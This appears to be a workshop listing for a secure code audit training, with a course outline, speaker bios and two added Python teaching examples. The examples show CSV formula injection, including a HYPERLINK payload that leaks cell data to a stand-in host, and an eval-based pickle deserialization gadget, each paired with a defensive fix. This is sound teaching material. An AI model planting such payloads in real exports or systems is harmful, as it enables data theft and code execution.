Contact Details

Hacking and Cyber Security Briefing
Manu Zacharia
+91-98470-96355
Thomas Kurian Ambattu
+91-94470-22081
Akash Joseph Thomas
+91-94974-65363

WS - 6

Secure code audit - NINJA Edition

Workshop Objective:

Secure code audit is a highly effective process for identifying vulnerabilities in software. It requires an in-depth analysis of an application's source in order to find its security flaws.

This training is hands-on: you will learn how to do secure code analysis and review, so bring your own laptop to perform different types of attacks against web-based applications.

Course Content (ToC):

    DAY 1

    • Module 1: Introduction to Secure Source Code Practices (SSCP)
      • What is SSCP
      • Need for SSCP security solution
    • Module 2: Parameter manipulation attack and Defenses
      • Bypassing client-side validation
      • Variable manipulation attacks
      • Input validation types
      • Blacklist vs whitelist filters
      • File Upload attacks and best practices
      • Insecure Direct Object References
      • Exploit CSV based export features using formula injection
      • Best practices and guidelines to avoid these Attacks
      • Demo
    • Module 3: SQL Injection
      • Blind & Second Order SQL injection
      • Demo
    • Module 4: Cross Site Scripting (XSS)
      • Reflected, Stored and DOM based XSS
      • Best practices and guidelines to avoid Cross Site Scripting Attack
      • Demo
    • Module 5: Cryptography
      • Encryption & Decryption
      • Encoding & Decoding
      • Hashing
      • Salted hash technique
      • Storage of critical information in backend side
      • Demo
    • Module 6: Cross Site Request Forgery (CSRF)
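As an added illustration of the kind of finding Day 1, Module 2 covers (the CSV export / formula injection item), the block below shows a naive CSV export beside a hardened one and a small audit helper that flags cells a spreadsheet would evaluate. It is editor-written example code, not material from the workshop or from h1hakz; the user rows are constructed sample data and the function names are the editor's own.

```python
"""Added example: CSV export hardened against formula injection.

Editor-constructed to illustrate the Day 1, Module 2 topic; not code from
the workshop or from h1hakz. The rows below are constructed sample data.
"""
import csv
import io

# Leading characters that make Excel / LibreOffice treat a cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed rows, as an export handler might read them from a database.
# The second "name" is attacker-controlled input that was stored earlier;
# the third shows that an innocent-looking value can also start with a trigger.
USERS = [
    {"id": 1, "name": "Alice", "email": "alice@example.com"},
    {"id": 2, "name": '=HYPERLINK("http://evil.example/?"&A1,"click")',
     "email": "mallory@example.com"},
    {"id": 3, "name": "-1+1", "email": "bob@example.com"},
]


def export_vulnerable(rows):
    """Writes values exactly as stored: a formula in any cell runs on open."""
    buf = io.StringIO()
    writer = csv.writer(buf)
    writer.writerow(["id", "name", "email"])
    for row in rows:
        writer.writerow([row["id"], row["name"], row["email"]])
    return buf.getvalue()


def neutralize_cell(value):
    """Prefix a cell that would be parsed as a formula with a single quote.

    Spreadsheet applications treat a leading apostrophe as "literal text".
    The apostrophe shows up in some viewers; that is the accepted trade-off.
    """
    text = str(value)
    if text and text[0] in FORMULA_TRIGGERS:
        return "'" + text
    return text


def export_hardened(rows):
    """Neutralizes every cell and quotes every field (OWASP CSV injection guidance)."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL)
    writer.writerow(["id", "name", "email"])
    for row in rows:
        writer.writerow([neutralize_cell(row["id"]),
                         neutralize_cell(row["name"]),
                         neutralize_cell(row["email"])])
    return buf.getvalue()


def audit_csv(text):
    """Audit helper: (row, column) of every cell that starts with a trigger.

    Run it over an application's actual export to confirm or rule out the flaw.
    """
    findings = []
    for i, row in enumerate(csv.reader(io.StringIO(text))):
        for j, cell in enumerate(row):
            if cell and cell[0] in FORMULA_TRIGGERS:
                findings.append((i, j))
    return findings


if __name__ == "__main__":
    print("vulnerable export flags:", audit_csv(export_vulnerable(USERS)))
    print("hardened export flags:  ", audit_csv(export_hardened(USERS)))
```

Note the trade-off the third row exposes: a legitimate value such as a negative number also gets the apostrophe, so a reviewer should check whether the export is consumed by another program (which then needs the original value) or only opened in a spreadsheet.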

    DAY 2

    • Module 1: Broken Authentication and Session Management
      • Best practices to manage session
      • Proper cookies attributes set
      • Proper implementation of OTP & CAPTCHA
      • Demo
    • Module 2: Error Handling and Logging
      • Proper implementation of log
      • Proper error handling
      • Demo
    • Module 3: Code quality
      • Language specific configuration check
      • Hard coded information
      • Critical information in comment
      • Client side hardcoded information
      • Best practices to check unused code
      • Demo
    • Module 4: XML External Entity (XXE) attacks
    • Module 5: Deserialization of untrusted objects
    • Module 6: CTF challenge on vulnerable source code application for attendees
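For the Day 2 deserialization module, the following added example shows the pattern a code reviewer flags (unpickling bytes a client controls) next to the restricted-unpickler fix described in the Python `pickle` documentation. It is editor-written illustration, not workshop code; the payloads are constructed in the block itself, and the gadget deliberately calls `eval("6*7")` instead of a shell command so that the demonstration stays harmless.

```python
"""Added example: why pickle.loads on untrusted data is code execution,
and an allowlisting Unpickler as the fix a reviewer would propose.

Editor-constructed for the Day 2 deserialization topic; not code from the
workshop or from h1hakz. Payloads below are built inline.
"""
import io
import pickle


class Gadget:
    """Attacker-shaped object: when unpickled, Python calls the callable
    returned by __reduce__ with the given arguments. eval("6*7") stands in
    for os.system(...) to keep the example harmless."""

    def __reduce__(self):
        return (eval, ("6*7",))


# Constructed "untrusted" inputs, e.g. a session cookie or a queue message.
MALICIOUS_PAYLOAD = pickle.dumps(Gadget())
BENIGN_PAYLOAD = pickle.dumps({"user": "alice", "roles": ["viewer"]})


def load_vulnerable(data):
    """The finding: pickle.loads on bytes the client controls."""
    return pickle.loads(data)


# Only plain data types are allowed through; no callables, no custom classes.
SAFE_BUILTINS = {"dict", "list", "set", "tuple", "str", "int", "float", "bool"}


class RestrictedUnpickler(pickle.Unpickler):
    """Allowlists find_class, the pattern given in the Python pickle docs."""

    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            import builtins
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def load_restricted(data):
    """Fix: refuse any global the allowlist does not name."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_rejected(data):
    """True when the restricted loader refuses the payload."""
    try:
        load_restricted(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable loader executed gadget, result:", load_vulnerable(MALICIOUS_PAYLOAD))
    print("restricted loader rejects gadget:", is_rejected(MALICIOUS_PAYLOAD))
    print("restricted loader accepts plain data:", load_restricted(BENIGN_PAYLOAD))
```

The restricted unpickler is the containment a reviewer can recommend when the format cannot change; the stronger recommendation is to carry such data as JSON or another data-only format and to authenticate it (for example an HMAC over the bytes) before parsing.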

Pre-requisite

  • A basic development background and familiarity with the OWASP Top 10 (see "Who should attend").
  • The training is hands-on, so bring your own laptop to perform the attacks against web-based applications.
  • System requirements:
    • A machine running Windows, Linux or macOS
    • RAM: 8 GB
    • Free disk space: 20 GB
    • VMware Player installed
    • Visual Studio installed
    • Notepad++ installed

Who should attend:

  • Those who want to build secure applications.
  • Those having basic development background.
  • Those who want to perform a manual secure source code review.
  • Those who want to learn various secure code audit methodologies and approaches.
  • Those who have very basic knowledge in OWASP Top 10.

What to expect:

  • Exposure to different tools used for secure code audit
  • Demo application to perform secure coding practices
  • Hands on CTF challenges

What not to expect:

  • Any professional tools

Speaker Profile:

Manoj Kumar, co-founder | h1hakz

Manoj Kumar has more than 6 years of experience in application security and secure coding processes and is a co-founder of h1hakz. He has developed many secure application projects in different languages and has code-reviewed a wide range of applications, from embedded systems to web applications, including retail banking and e-commerce applications. He has also given training at c0c0n XI, BSides Delaware, WOPR and HackMiami, among others.

  • Company/Organization: h1hakz
  • Country: India
Ranjith Menon, co-founder | h1hakz

Ranjith Menon has more than 8 years of experience. He is an active participant in bug bounty programs, specializes in web application, mobile and cloud security, and is a contributor to the security community and a co-founder of h1hakz, an open platform for knowledge sharing through a webcast series. He has found many vulnerabilities for many organizations and has also given training at c0c0n XI, BSides Delaware, WOPR and HackMiami, among others. Apart from hacking, he makes time for fitness in his work schedule.

  • Company/Organization: h1hakz
  • Country: India